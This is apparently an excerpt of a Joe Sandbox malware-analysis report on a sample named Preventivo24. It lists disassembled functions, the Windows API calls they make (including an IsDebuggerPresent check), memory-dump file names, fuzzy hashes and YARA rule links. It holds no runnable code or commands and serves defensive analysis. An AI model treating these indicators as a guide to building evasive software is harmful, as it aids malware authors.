Opcode Fuzzy Hash: b91d12ee96c3eef0700638eba9d1d3a3af7618fcdced07af6e565c4de9b1a02a
Instruction Fuzzy Hash: 8E01D4326442096BCB14DE2ADC09BDE7BEAEFD4328F08C264AD1DD6240EB34D941C690

Uniqueness

Uniqueness Score: -1.00%

Function 009E7AA0 Relevance: 4.7, APIs: 3, Instructions: 204COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00BE3E62
GetVersionExW.KERNEL32(00000114), ref: 00BE3EB1
IsProcessorFeaturePresent.KERNEL32(00000011), ref: 00BE3EC9

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Version$FeaturePresentProcessor
String ID:
API String ID: 1871528217-0
Opcode ID: f5537987ecc107a05f6a31190e1ce3e3d8994aa80f3f012d744bffd89626c9ac
Instruction ID: 55df815d8dfb66782e80fc43f8a783158207dc525a8e3ec9b2196f0bb9025047
Opcode Fuzzy Hash: f5537987ecc107a05f6a31190e1ce3e3d8994aa80f3f012d744bffd89626c9ac
Instruction Fuzzy Hash: 2D610872B142644BE348CF2E8CC52AABBD5EBC9745F04477EE496C7290DBB8C545CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AFF570 Relevance: 4.7, APIs: 3, Instructions: 172fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,26FBC52C,?,?), ref: 00AFF62F
FindNextFileW.KERNEL32(000000FF,00000010), ref: 00AFF73A
FindClose.KERNEL32(000000FF), ref: 00AFF795

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: fa46a000baaa5033791cb84e5aad6783738cfc42132ff65a73cbea7bd415faa5
Instruction ID: 0c9e4264b95dfbdba669b1c076fb896d5041f85cf5293674f6a101e0cd438768
Opcode Fuzzy Hash: fa46a000baaa5033791cb84e5aad6783738cfc42132ff65a73cbea7bd415faa5
Instruction Fuzzy Hash: 2861AC7190025D9FCF24EFA5C889BEEB7B8EF44310F1445A9E449A72A1DB701E84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A02E50 Relevance: 4.6, APIs: 3, Instructions: 103COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000004), ref: 00A02EAB
GetWindowLongW.USER32(00000004,000000FC), ref: 00A02EC4
SetWindowLongW.USER32(00000004,000000FC,?), ref: 00A02ED6

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: bdbfd84b79dab0658c3b999a8147995f4d8a02ac7b9b348e7d76dfcdcbb8b689
Instruction ID: 011eaa5fe1c1765ea98e8269fbad66aaa8064deacb76770576ee6b724b313dfb
Opcode Fuzzy Hash: bdbfd84b79dab0658c3b999a8147995f4d8a02ac7b9b348e7d76dfcdcbb8b689
Instruction Fuzzy Hash: 4D418AB0A04B1AAFDB10DF65D848B5ABBF8FF05324F004268E514DB790DB76A924CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A09070 Relevance: 4.6, APIs: 3, Instructions: 87COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(00000003,000000FC), ref: 00A090C6
SetWindowLongW.USER32(00000003,000000FC,?), ref: 00A090D8
DeleteCriticalSection.KERNEL32(?,26FBC52C,?,?,?,?,00C18014,000000FF), ref: 00A09103

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: LongWindow$CriticalDeleteSection
String ID:
API String ID: 1978754570-0
Opcode ID: d358b2b2c82b9ebe0a69786160f12be202b1e882eed23f75330ee01204990f28
Instruction ID: f6bfd4ad13ff69acc1c3095dcb09b8fcd973cd8cbcdc0f1e1ec407e643ed29c4
Opcode Fuzzy Hash: d358b2b2c82b9ebe0a69786160f12be202b1e882eed23f75330ee01204990f28
Instruction Fuzzy Hash: D231B070A0474AEBCB10CF24DC48B4ABBE8BB06720F144259F814E37D1DB71E914DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BEF843 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00BEF93B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00BEF945
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00BEF952

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 443d4815e290a23616c13df841554dbe9c3207e9eb2d3751e3c14ca7364371ee
Instruction ID: 87f1e7ed31250a7ab64ff2285eee13465b6d25ae7c1decc658da0b393092728c
Opcode Fuzzy Hash: 443d4815e290a23616c13df841554dbe9c3207e9eb2d3751e3c14ca7364371ee
Instruction Fuzzy Hash: 0531C27490122DABCB21DF69D989B9DBBF8BF08310F5042EAE41CA7251E7749F858F44

Uniqueness

Uniqueness Score: -1.00%

Function 009EA740 Relevance: 4.6, APIs: 3, Instructions: 65COMMON

Download Yara Rule

APIs

LoadResource.KERNEL32(00000000,00000000,26FBC52C,00000001,00000000,00000000,00000000,00C118B0,000000FF,?,009EA6EC,?,?,009EA890,00000000,?), ref: 009EA76B
LockResource.KERNEL32(00000000,?,009EA6EC,?,?,009EA890,00000000,?,00000000,009EAA2B,-00000010,?,?,?,26FBC52C,00000000), ref: 009EA776
SizeofResource.KERNEL32(00000000,00000000,?,009EA6EC,?,?,009EA890,00000000,?,00000000,009EAA2B,-00000010,?,?,?,26FBC52C), ref: 009EA784

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Resource$LoadLockSizeof
String ID:
API String ID: 2853612939-0
Opcode ID: 6888d007bf7957e97201145fe2d55a3e18502846f71df19ed0802b932e65a502
Instruction ID: f82880cebdec2067305c20b88f1dd15a00e532edc76e92abd1db1294585a19cd
Opcode Fuzzy Hash: 6888d007bf7957e97201145fe2d55a3e18502846f71df19ed0802b932e65a502
Instruction Fuzzy Hash: DC11CD33E046559BC735DF59DC45B6AB7FCE749B11F014A3BED19D3250EA36AC008690

Uniqueness

Uniqueness Score: -1.00%

Function 009FADD0 Relevance: 4.5, APIs: 3, Instructions: 28COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(0000001B,000000FC), ref: 009FADE9
SetWindowLongW.USER32(0000001B,000000FC,?), ref: 009FADF7
DestroyWindow.USER32(0000001B,?,?,?,?,?,?,?,?,?,?,?,?,80004003,?,00000000), ref: 009FAE23

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Window$Long$Destroy
String ID:
API String ID: 3055081903-0
Opcode ID: f7d9a96d4ba91ba617aab66b07976c066dc26cb3dbb37f70fa74244492dd1d63
Instruction ID: caeb8890db61e05a4267a1c3208ecf0085301a0c6873696a2630038a47666f6d
Opcode Fuzzy Hash: f7d9a96d4ba91ba617aab66b07976c066dc26cb3dbb37f70fa74244492dd1d63
Instruction Fuzzy Hash: CAF03A30404B159BDB615B28ED44B92BBE5BF05B21B044B1CF5AAD26E0DB30E800EB10

Uniqueness

Uniqueness Score: -1.00%

Function 00B8CA50 Relevance: 4.1, Strings: 3, Instructions: 314COMMON

Download Yara Rule

Strings

Show, xrefs: 00B8CBDA
) AND ( , xrefs: 00B8CC33
gfff, xrefs: 00B8CB92

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID:
String ID: ) AND ( $Show$gfff
API String ID: 0-344708357
Opcode ID: 49b5b4af9c159931c1c300d4379e03d21608a00236248bf69ebc9877f780d18c
Instruction ID: e59a196b58a19c63406ba53927d3aaf8237ba174e4662d0c548e174fe4bd2bf0
Opcode Fuzzy Hash: 49b5b4af9c159931c1c300d4379e03d21608a00236248bf69ebc9877f780d18c
Instruction Fuzzy Hash: 55D179B1900258CFDB24DF68C845BAEBBF1EF45304F1485EDD449A7291DB70AE84CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B56820 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00D30098), ref: 00B5687F

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

Strings

%04d-%02d-%02d %02d-%02d-%02d, xrefs: 00B568CD

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: HeapLocalProcessTime
String ID: %04d-%02d-%02d %02d-%02d-%02d
API String ID: 1554148984-3768011868
Opcode ID: cfe684cc51ca8534ea30145c161a04bacb2f97d10b08e5c933990fc26f039cef
Instruction ID: 530d992ab649221619736c7e59d0fa854ec4a4fa5eabb241792cbe94e0b064e7
Opcode Fuzzy Hash: cfe684cc51ca8534ea30145c161a04bacb2f97d10b08e5c933990fc26f039cef
Instruction Fuzzy Hash: 56214CB1D042089FDB14DF9AD945BAEB7F8EB48710F10425AF915A7280EB746940CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00BFA7D0 Relevance: 3.4, APIs: 2, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89d43bcd608003b685ae1a0886c5230780c6e278220e293941602e4ddc60863e
Instruction ID: ae4497afe8906059396c2989da6aeb3729c1f9810ea0330f0d08821949fdece7
Opcode Fuzzy Hash: 89d43bcd608003b685ae1a0886c5230780c6e278220e293941602e4ddc60863e
Instruction Fuzzy Hash: 85F13FB1E002199FDF18CF68D980AADB7F1FF88314F1582A9E919A7381D7309D45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00A16600 Relevance: 3.3, APIs: 2, Instructions: 288windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000102B,00000000,?), ref: 00A1672B
SendMessageW.USER32(?,0000102B,0000009B,-00000002), ref: 00A16968

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: ef25e3304a6ccb8298685f96590c80a5afbb34906408aeba5a7553ec1674fc45
Instruction ID: 995dfd773bf21c935c84283896d020d1ee6f18ce3cb28add0ac3415ea5d20741
Opcode Fuzzy Hash: ef25e3304a6ccb8298685f96590c80a5afbb34906408aeba5a7553ec1674fc45
Instruction Fuzzy Hash: 3DC19071A002068FDF18CF64C995AEEBBF5FF58304F188169D859EF295D734A981CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B43210 Relevance: 3.2, APIs: 2, Instructions: 151fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000000,?,?,00000003,26FBC52C,00000000,?,?), ref: 00B43304
FindClose.KERNEL32(00000000,?,?), ref: 00B4334F

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: eb2ff92532a3147635f6bd8cb20e8784299e0de4251c9f48b96ace4564a918d6
Instruction ID: 15baee693d7b007328034281318c66e2b469ba008fb0ac1eed2f4fa5f5cdb54a
Opcode Fuzzy Hash: eb2ff92532a3147635f6bd8cb20e8784299e0de4251c9f48b96ace4564a918d6
Instruction Fuzzy Hash: 1C51AC7190064ACFDB21DF68C894BAEBBF4FF48314F244599E815AB381DB34AA05CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00B20AF0 Relevance: 3.1, APIs: 2, Instructions: 145windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,26FBC52C,?,00000000), ref: 00B20B3B
GetLastError.KERNEL32(?,00000000), ref: 00B20B45

Part of subcall function 009EB070: RtlAllocateHeap.NTDLL(?,00000000,?,26FBC52C,00000000,00C11B00,000000FF,?,?,00D25D3C,?,00000000,00B69FAB,8000000B,26FBC52C), ref: 009EB0BA

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AllocateErrorFormatHeapLastMessage
String ID:
API String ID: 4114510652-0
Opcode ID: 4c4f9c8ed5daf75c92f89d8679651dd535eecd99b65bd9231df85c479737fcf6
Instruction ID: 31a684cfb3b507603ea307b74a909d7230c013e3d9ddbcd8e6224c256acbc3ef
Opcode Fuzzy Hash: 4c4f9c8ed5daf75c92f89d8679651dd535eecd99b65bd9231df85c479737fcf6
Instruction Fuzzy Hash: 8B41C0B1A042199FDB20DF99D8457BEBBF4FB84714F1002AEE919A7381EBB55D00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B7C3F0 Relevance: 3.1, Strings: 2, Instructions: 604COMMON

Download Yara Rule

Strings

Name, xrefs: 00B7C80D
{Binary Data}, xrefs: 00B7C742

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID:
String ID: Name${Binary Data}
API String ID: 0-874704490
